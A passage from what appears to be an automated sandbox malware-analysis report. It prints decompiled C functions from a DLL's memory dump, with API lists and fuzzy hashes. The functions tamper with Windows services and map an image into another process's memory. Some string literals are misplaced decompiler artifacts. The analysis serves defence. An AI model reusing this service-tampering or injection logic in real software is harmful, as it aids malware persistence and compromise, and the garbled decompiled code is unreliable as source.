                                                                                                                        					_t31 = 0;
                                                                                                                        					while(1) {
                                                                                                                        						QueryServiceStatus(_t28,  &_v28);
                                                                                                                        						if(_v24 == 1) {
                                                                                                                        							goto L9;
                                                                                                                        						}
                                                                                                                        						Sleep(0x3e8);
                                                                                                                        						_t31 = _t31 + 1;
                                                                                                                        						if(_t31 < 0x3c) {
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						goto L12;
                                                                                                                        					}
                                                                                                                        					goto L9;
                                                                                                                        				}
                                                                                                                        				_t24 = OpenSCManagerA(_t12, _t12, 1);
                                                                                                                        				if(_t24 == 0) {
                                                                                                                        					goto L14;
                                                                                                                        				}
                                                                                                                        				goto L2;
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333719
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333725
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 6F33373D
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33374F
                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 6F333764
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33377C
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F33378E
                                                                                                                        • DeleteService.ADVAPI32(00000000), ref: 6F3337AA
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337B5
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337C0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$Open$CloseHandleManagerQueryStatus$ControlDeleteSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3264530519-0
                                                                                                                        • Opcode ID: d1ddb42e66a8eb90f4376716a6b95f4a27417c971984c5e5bba463e16b09566a
                                                                                                                        • Instruction ID: 5263d4b2a8fcea566895c1d9edce346c899a6bba8f128117c562c56ae9b7ae69
                                                                                                                        • Opcode Fuzzy Hash: d1ddb42e66a8eb90f4376716a6b95f4a27417c971984c5e5bba463e16b09566a
                                                                                                                        • Instruction Fuzzy Hash: F32105B3904799ABD710DF648CC9A7F77FDEB8AB11F00051DF94086100DBB1E8498762
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F3337D0(int _a4, char** _a8, int _a12) {
                                                                                                                        				intOrPtr _v24;
                                                                                                                        				struct _SERVICE_STATUS _v28;
                                                                                                                        				int _t14;
                                                                                                                        				long _t18;
                                                                                                                        				int _t26;
                                                                                                                        				void* _t31;
                                                                                                                        				void* _t33;
                                                                                                                        
                                                                                                                        				_t31 = _a4;
                                                                                                                        				if(_t31 == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_a4 = 0;
                                                                                                                        					if(QueryServiceConfigA(_t31, 0, 0,  &_a4) != 0) {
                                                                                                                        						_t18 = _a4;
                                                                                                                        						_t26 = _t18;
                                                                                                                        						_t33 = HeapAlloc(GetProcessHeap(), 8, _t18);
                                                                                                                        						if(_t33 != 0) {
                                                                                                                        							if(QueryServiceConfigA(_t31, _t33, _t26,  &_a4) != 0 &&  *((intOrPtr*)(_t33 + 4)) != 2) {
                                                                                                                        								ChangeServiceConfigA(_t31, 0xffffffff, 2, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
                                                                                                                        							}
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t33);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t14 = QueryServiceStatus(_t31,  &_v28);
                                                                                                                        					if(_v24 != 4 || _t14 == 0) {
                                                                                                                        						StartServiceA(_t31, _a12, _a8);
                                                                                                                        					}
                                                                                                                        					return 1;
                                                                                                                        				}
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                        • QueryServiceConfigA.ADVAPI32 ref: 6F3337F9
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000), ref: 6F33380A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333811
                                                                                                                        • QueryServiceConfigA.ADVAPI32(?,00000000,?,?), ref: 6F333825
                                                                                                                        • ChangeServiceConfigA.ADVAPI32(?,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F333846
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33384F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333856
                                                                                                                        • QueryServiceStatus.ADVAPI32(?,?), ref: 6F333864
                                                                                                                        • StartServiceA.ADVAPI32(?,?,?), ref: 6F333881
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$Heap$ConfigQuery$Process$AllocChangeFreeStartStatus
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1115209516-0
                                                                                                                        • Opcode ID: 316321dbec79f1ad0a06c4a981634d515364f495dcd244e94ef274cd30321a77
                                                                                                                        • Instruction ID: 6b9c217e72629dd9ae21a3bc7e989c57eb31603a4ef8cae699d9587f01e7282d
                                                                                                                        • Opcode Fuzzy Hash: 316321dbec79f1ad0a06c4a981634d515364f495dcd244e94ef274cd30321a77
                                                                                                                        • Instruction Fuzzy Hash: 3511DF32604754BBE620DA648C4AFBB7BBDEF85B70F40861DF519DA180D732E8158B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E6F332640() {
                                                                                                                        				char _v8;
                                                                                                                        				void* _v16;
                                                                                                                        				long _v24;
                                                                                                                        				void* _v32;
                                                                                                                        				long _v44;
                                                                                                                        				void* _v48;
                                                                                                                        				void* _v56;
                                                                                                                        				void* _v64;
                                                                                                                        				long _v80;
                                                                                                                        				void* _v88;
                                                                                                                        				void* _v92;
                                                                                                                        				void* _v120;
                                                                                                                        				intOrPtr _v132;
                                                                                                                        				void* _v136;
                                                                                                                        				void* _v140;
                                                                                                                        				void* _t45;
                                                                                                                        				void* _t58;
                                                                                                                        				intOrPtr _t59;
                                                                                                                        
                                                                                                                        				_t58 = "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD";
                                                                                                                        				_t1 = _t58 + 0x3c; // 0xf8
                                                                                                                        				_t59 =  *_t1;
                                                                                                                        				_t45 = 0;
                                                                                                                        				if( *((intOrPtr*)(_t59 + _t58)) == 0x4550) {
                                                                                                                        					_push(8);
                                                                                                                        					_push( &_v8);
                                                                                                                        					_v24 = 0;
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_v16 =  *(_t59 + _t58 + 0x50);
                                                                                                                        					if(NtCreateSection( &_v32, 0xe, 0,  &_v16, 0x40, 0x8000000, 0) >= 0) {
                                                                                                                        						_v48 = 0;
                                                                                                                        						_v44 = 0;
                                                                                                                        						if(NtMapViewOfSection(_v56, 0xffffffff,  &_v48, 0, 0, 0,  &_v44, 2, 0, 0x40) >= 0) {
                                                                                                                        							_v88 = 0;
                                                                                                                        							if(NtMapViewOfSection(_v92, _v64,  &_v88, 0, 0, 0,  &_v80, 2, 0, 0x40) >= 0) {
                                                                                                                        								RtlMoveMemory(_v120, _t58,  *(_t59 + _t58 + 0x50));
                                                                                                                        								if(E6F3325B0(_v132, _v136) == 0) {
                                                                                                                        									NtUnmapViewOfSection(_v140, _v136);
                                                                                                                        								} else {
                                                                                                                        									_t45 = _v136;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							NtUnmapViewOfSection(0xffffffff, _v120);
                                                                                                                        						}
                                                                                                                        						NtClose(_v92);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t45;
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000008), ref: 6F332669
                                                                                                                        • NtCreateSection.NTDLL ref: 6F33268B
                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326B9
                                                                                                                        • NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326E2
                                                                                                                        • RtlMoveMemory.NTDLL(?,6F330000,?), ref: 6F3326F6
                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 6F332721
                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6F33272D
                                                                                                                        • NtClose.NTDLL(?), ref: 6F332737
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Section$View$MemoryUnmap$CloseCreateMoveZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1304417992-0
                                                                                                                        • Opcode ID: 24aa4d2842e9f3f6c4d282406a3453828eb1ea6e8f1eba35bf3f88bb66c009d4
                                                                                                                        • Instruction ID: 354695f8e0d8794e2a2a7c850580af7fd883c47243ce42f0c314c4392ee4c867
                                                                                                                        • Opcode Fuzzy Hash: 24aa4d2842e9f3f6c4d282406a3453828eb1ea6e8f1eba35bf3f88bb66c009d4
                                                                                                                        • Instruction Fuzzy Hash: 6B3100B6608351BFE210DA94CDC0E6BB7ECFBC8658F404A1DF69596281D774ED048BB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F337790(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                        				void* _t7;
                                                                                                                        				void* _t8;
                                                                                                                        				_Unknown_base(*)()* _t10;
                                                                                                                        				long _t14;
                                                                                                                        				void* _t17;
                                                                                                                        				int _t20;
                                                                                                                        				void* _t22;
                                                                                                                        				void* _t24;
                                                                                                                        				struct HWND__* _t25;
                                                                                                                        				int _t26;
                                                                                                                        				void* _t27;
                                                                                                                        
                                                                                                                        				_t20 = _a12;
                                                                                                                        				_t26 = _a8;
                                                                                                                        				_t25 = _a4;
                                                                                                                        				_t27 = _t26 - 0x16;
                                                                                                                        				if(_t27 > 0) {
                                                                                                                        					if(_t26 == 0x18) {
                                                                                                                        						goto L15;
                                                                                                                        					} else {
                                                                                                                        						if(_t26 == 0x112) {
                                                                                                                        							_t7 = _t20 - 0xf020;
                                                                                                                        							if(_t7 == 0) {
                                                                                                                        								goto L15;
                                                                                                                        							} else {
                                                                                                                        								_t8 = _t7 - 0x10;
                                                                                                                        								if(_t8 == 0 || _t8 == 0xf0) {
                                                                                                                        									goto L15;
                                                                                                                        								} else {
                                                                                                                        									goto L19;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							if(_t26 != 0x83fc) {
                                                                                                                        								goto L19;
                                                                                                                        							} else {
                                                                                                                        								"one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t20;
                                                                                                                        								M6F3404C0 = CreateThread(0, 0, E6F336D50, 0, 0,  &M6F3404C4);
                                                                                                                        								goto L15;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					if(_t27 == 0) {
                                                                                                                        						PostMessageA(_t25, 0x10, 0, 0);
                                                                                                                        						goto L19;
                                                                                                                        					} else {
                                                                                                                        						if(_t26 == 3 || _t26 == 7) {
                                                                                                                        							L15:
                                                                                                                        							return 0;
                                                                                                                        						} else {
                                                                                                                        							if(_t26 == 0x10) {
                                                                                                                        								M6F3404B0 = 1;
                                                                                                                        								if(M6F3404C0 != 0) {
                                                                                                                        									_t14 = M6F3404C4; // 0x0
                                                                                                                        									PostThreadMessageA(_t14, _t26, 0, 0);
                                                                                                                        									_t22 = M6F3404C0; // 0x0
                                                                                                                        									if(WaitForSingleObject(_t22, 0x1388) != 0) {
                                                                                                                        										_t24 = M6F3404C0; // 0x0
                                                                                                                        										NtTerminateThread(_t24, 0);
                                                                                                                        									}
                                                                                                                        									_t17 = M6F3404C0; // 0x0
                                                                                                                        									CloseHandle(_t17);
                                                                                                                        								}
                                                                                                                        								PostQuitMessage(0);
                                                                                                                        							}
                                                                                                                        							L19:
                                                                                                                        							_t10 = "one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
                                                                                                                        							return CallWindowProcW(_t10, _t25, _t26, _t20, _a16);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}
                                                                                                                        0x6f33780d
                                                                                                                        0x6f337813
                                                                                                                        0x6f337813
                                                                                                                        0x6f33781b
                                                                                                                        0x6f33781b
                                                                                                                        0x6f337889
                                                                                                                        0x6f33788d
                                                                                                                        0x6f3378a0
                                                                                                                        0x6f3378a0
                                                                                                                        0x6f3377ad
                                                                                                                        0x6f3377a8

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageA.USER32 ref: 6F3377E3
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 6F3377F5
                                                                                                                        • NtTerminateThread.NTDLL ref: 6F337808
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F337813
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 6F33781B
                                                                                                                        • PostMessageA.USER32 ref: 6F33782A
                                                                                                                        • CreateThread.KERNEL32 ref: 6F337861
                                                                                                                        • CallWindowProcW.USER32(00000000,?,?,?,?), ref: 6F337897
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread$CallCloseCreateHandleObjectProcQuitSingleTerminateWaitWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1229868629-0
                                                                                                                        • Opcode ID: 824dcab9c096e68e035363804d759b246c01f09b7ba470af863497fe13b3871a
                                                                                                                        • Instruction ID: ca06e3b13392cbce3a3c6e23bb8c6b3b4d7e50a930f95373addd9bf49e26902b
                                                                                                                        • Opcode Fuzzy Hash: 824dcab9c096e68e035363804d759b246c01f09b7ba470af863497fe13b3871a
                                                                                                                        • Instruction Fuzzy Hash: 1021D873F483A5BBEB20EA588C4AF967A6CE796721F00052EF2519B2C0C775A814CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334E50(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                        				signed int _t20;
                                                                                                                        				struct HINSTANCE__* _t22;
                                                                                                                        				int _t23;
                                                                                                                        				struct HRSRC__* _t28;
                                                                                                                        				void* _t29;
                                                                                                                        				void* _t30;
                                                                                                                        				void* _t32;
                                                                                                                        
                                                                                                                        				_t22 = _a4;
                                                                                                                        				_t30 = 0;
                                                                                                                        				_t28 = FindResourceW(_t22, _a8, 5);
                                                                                                                        				if(_t28 == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t32 = LoadResource(_t22, _t28);
                                                                                                                        					if(_t32 != 0) {
                                                                                                                        						_t23 = SizeofResource(_t22, _t28);
                                                                                                                        						_t29 = LockResource(_t32);
                                                                                                                        						if(_t29 != 0) {
                                                                                                                        							_t30 = HeapAlloc(GetProcessHeap(), 8, _t23);
                                                                                                                        							RtlMoveMemory(_t30, _t29, _t23);
                                                                                                                        							_t20 =  *(_t30 + 0xc);
                                                                                                                        							if((_t20 & 0x40000000) == 0) {
                                                                                                                        								 *(_t30 + 8) =  *(_t30 + 8) & 0xfffbffff | 0x08000080;
                                                                                                                        							}
                                                                                                                        							 *(_t30 + 0xc) = _t20 & 0xefffffff;
                                                                                                                        							 *((intOrPtr*)(_t30 + 0x16)) = 0;
                                                                                                                        						}
                                                                                                                        						FreeResource(_t32);
                                                                                                                        					}
                                                                                                                        					return _t30;
                                                                                                                        				}
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(?,?,00000005), ref: 6F334E61
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 6F334E70
                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 6F334E7E
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 6F334E87
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 6F334E96
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334E9D
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6F334EA8
                                                                                                                        • FreeResource.KERNEL32(00000000), ref: 6F334ED7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$Heap$AllocFindFreeLoadLockMemoryMoveProcessSizeof
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1815471765-0
                                                                                                                        • Opcode ID: f656d0bbd55f484103c88bf511f25de415d8a019537d68e7b4a1f8ba1e757561
                                                                                                                        • Instruction ID: 5552bbe0884fbf667e1d4cc689b403cf4a17fa970377ca752b7090be4ae3ed36
                                                                                                                        • Opcode Fuzzy Hash: f656d0bbd55f484103c88bf511f25de415d8a019537d68e7b4a1f8ba1e757561
                                                                                                                        • Instruction Fuzzy Hash: C211C673A00F59ABD320DBBACC48E67BBADFB86771F00851DF516C2250DA35D8108760
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F3319F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                        				void* _v4;
                                                                                                                        				intOrPtr _v8;
                                                                                                                        				intOrPtr _v12;
                                                                                                                        				void* _v16;
                                                                                                                        				void* _v20;
                                                                                                                        				void* _v24;
                                                                                                                        				char _v28;
                                                                                                                        				intOrPtr _v32;
                                                                                                                        				void* _v44;
                                                                                                                        				intOrPtr _v172;
                                                                                                                        				char _v356;
                                                                                                                        				long _v360;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* _t52;
                                                                                                                        				void* _t69;
                                                                                                                        				intOrPtr _t70;
                                                                                                                        				intOrPtr* _t83;
                                                                                                                        				signed int _t85;
                                                                                                                        				intOrPtr _t88;
                                                                                                                        
                                                                                                                        				_t82 = _a4;
                                                                                                                        				_t69 = 0;
                                                                                                                        				if(_a4 != 0) {
                                                                                                                        					_t91 = _a8;
                                                                                                                        					_v44 = 0;
                                                                                                                        					_v24 = 0;
                                                                                                                        					_v16 = 0;
                                                                                                                        					_v20 = 0;
                                                                                                                        					_v4 = 0;
                                                                                                                        					_t88 = E6F331400( &_v356, _t82, _a8);
                                                                                                                        					if(_t88 != 0) {
                                                                                                                        						_t83 = _a16;
                                                                                                                        					} else {
                                                                                                                        						_t70 = _a12;
                                                                                                                        						_push( &_v356);
                                                                                                                        						_t88 = E6F3314E0(_t70);
                                                                                                                        						if(_t88 != 0) {
                                                                                                                        							_t83 = _a16;
                                                                                                                        						} else {
                                                                                                                        							_t88 = E6F3315C0( &_v356, _t82, _t91, _t70);
                                                                                                                        							if(_t88 != 0) {
                                                                                                                        								L18:
                                                                                                                        								_t83 = _a16;
                                                                                                                        								goto L19;
                                                                                                                        							} else {
                                                                                                                        								_t88 = E6F331660( &_v356);
                                                                                                                        								if(_t88 != 0) {
                                                                                                                        									goto L18;
                                                                                                                        								} else {
                                                                                                                        									_t88 = E6F331720( &_v356);
                                                                                                                        									if(_t88 != 0) {
                                                                                                                        										if(_v24 != 0) {
                                                                                                                        											_t85 = 0;
                                                                                                                        											if(_v20 > 0) {
                                                                                                                        												do {
                                                                                                                        													FreeLibrary( *(_v24 + _t85 * 4));
                                                                                                                        													_t85 = _t85 + 1;
                                                                                                                        												} while (_t85 < _v20);
                                                                                                                        											}
                                                                                                                        											HeapFree(GetProcessHeap(), 0, _v24);
                                                                                                                        										}
                                                                                                                        										goto L18;
                                                                                                                        									} else {
                                                                                                                        										_t88 = E6F3318D0( &_v356);
                                                                                                                        										if(_t88 != 0) {
                                                                                                                        											goto L18;
                                                                                                                        										} else {
                                                                                                                        											_t83 = _a16;
                                                                                                                        											if(_t83 != 0) {
                                                                                                                        												_v12 =  *((intOrPtr*)(_t83 + 0x2c));
                                                                                                                        												_v8 =  *((intOrPtr*)(_t83 + 0x30));
                                                                                                                        											}
                                                                                                                        											_t88 = E6F3319A0( &_v356, _t70);
                                                                                                                        											if(_t88 != 0) {
                                                                                                                        												L19:
                                                                                                                        												_push(0x8000);
                                                                                                                        												_push( &_v360);
                                                                                                                        												_push( &_v28);
                                                                                                                        												_push(0xffffffff);
                                                                                                                        												_v360 = 0;
                                                                                                                        												L6F33C2D6();
                                                                                                                        											} else {
                                                                                                                        												if(_t83 != 0) {
                                                                                                                        													 *((intOrPtr*)(_t83 + 0xc)) = _v32;
                                                                                                                        													 *((intOrPtr*)(_t83 + 0x10)) = _v28;
                                                                                                                        													 *((intOrPtr*)(_t83 + 0x14)) = _v4;
                                                                                                                        													 *((intOrPtr*)(_t83 + 4)) = 0x3c;
                                                                                                                        													 *((intOrPtr*)(_t83 + 8)) = _t70;
                                                                                                                        													 *((intOrPtr*)(_t83 + 0x18)) = _v172;
                                                                                                                        													 *(_t83 + 0x1c) = _v24;
                                                                                                                        													 *((intOrPtr*)(_t83 + 0x20)) = _v20;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t52 = _v44;
                                                                                                                        						if(_t52 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t52);
                                                                                                                        						}
                                                                                                                        						_t69 = 0;
                                                                                                                        					}
                                                                                                                        					if(_t83 != _t69) {
                                                                                                                        						 *_t83 = _t88;
                                                                                                                        					}
                                                                                                                        					return _t88;
                                                                                                                        				} else {
                                                                                                                        					_t2 = _t69 - 2; // -2
                                                                                                                        					return _t2;
                                                                                                                        				}
                                                                                                                        			}
























                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F331BCF
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331BD6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 047380f890eb2922787d5ec1697360bffd52bdff47e78a173ec9d8d4179a37bf
                                                                                                                        • Instruction ID: 9fb6415a86b195740a8fd1d14fe53390594b20f304f46608c5d4b538d76cb9c6
                                                                                                                        • Opcode Fuzzy Hash: 047380f890eb2922787d5ec1697360bffd52bdff47e78a173ec9d8d4179a37bf
                                                                                                                        • Instruction Fuzzy Hash: A6513E76D087A59BC330EF54D880ADBB7E9BF88354F014A2DDC8897340E736A845CB92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 57%
                                                                                                                        			E6F331C00(intOrPtr _a4) {
                                                                                                                        				long _v4;
                                                                                                                        				intOrPtr* _t24;
                                                                                                                        				intOrPtr _t30;
                                                                                                                        				signed int _t37;
                                                                                                                        				intOrPtr _t39;
                                                                                                                        				void* _t40;
                                                                                                                        
                                                                                                                        				_t39 = _a4;
                                                                                                                        				_t40 = 1;
                                                                                                                        				if(_t39 == 0 ||  *((intOrPtr*)(_t39 + 4)) != 0x3c ||  *((intOrPtr*)(_t39 + 0xc)) == 0) {
                                                                                                                        					L14:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t30 = _t39 + 0x10;
                                                                                                                        					_a4 = _t30;
                                                                                                                        					if( *((intOrPtr*)(_t39 + 0x10)) == 0) {
                                                                                                                        						goto L14;
                                                                                                                        					} else {
                                                                                                                        						if( *(_t39 + 0x1c) != 0) {
                                                                                                                        							_t37 = 0;
